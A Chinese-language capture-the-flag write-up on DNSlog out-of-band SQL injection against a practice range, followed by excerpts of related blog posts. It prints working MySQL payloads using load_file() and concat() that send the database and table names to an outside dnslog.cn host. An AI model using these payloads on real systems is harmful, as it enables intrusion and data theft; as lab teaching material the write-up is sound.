測試靶場(掌控安全學院靶場):
明白dns原理,知道網域名稱解析時網域名稱伺服器會記錄log,但在別人伺服器上我們看不到該log,則找工具:dnslog.cn 或者 ceye.io 上去回顯出我們想要的資料
以mysql為例,構造注入語句,以load_file()函式配合dns-log得到資料
mysql中load_file()函式為載入檔案,因此可構造此型別語句得到資料庫資料:
select load_file("//file_path/file_name")
對此可拼接以下語句:
and (select load_file(concat('//',(select database()),'.rvf4kw.dnslog.cn/1.txt')))
在dnslog.cn中可查詢到注入回顯資料:
maoshe.rvf4kw.dnslog.cn
可得知當前database為:maoshe
找出該庫下的所有表:admin、news
and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.rvf4kw.dnslog.cn/1.txt')))
由此可繼續探索拿到我們想要的flag:flag-biubiu
學習DNSlog注入
學習 dnslog注入 簡介在sql注入無回顯的情況下,盲注是一種辦法,但費時。dnslog注入可以將資料外帶,通過dns解析日誌讀取回顯資料。原理及利用場景詳見大佬們的部落格 t1ddl3r 使用dnslog拯救你的盲打盲注 afanti 巧用dnslog實現無回顯注入 armyzer0 利用dn...
DNSlog注入姿勢
簡介 本文記錄sql注入中的注入姿勢dnslog注入原理及其構造payload過程 1.注入原理 2.注入過程 總結dnslog注入不是一種新的sql注入方式,而是一種注入姿勢。方便為我們進行sql注入提供方法 dns domain name system 網域名稱系統,它作為將網域名稱和ip位址相...
DNSLog注入筆記
測試一些 的時候,一些注入都是無回顯的,我們可以寫指令碼來進行盲注,但有些 會ban掉我們的ip,這樣我們可以通過設定ip 池解決,但是盲注往往效率很低,所以產生了dnslog注入。具體原理如下。首先需要有乙個可以配置的網域名稱,比如 ceye.io,然後通過 商設定網域名稱 ceye.io 的 n...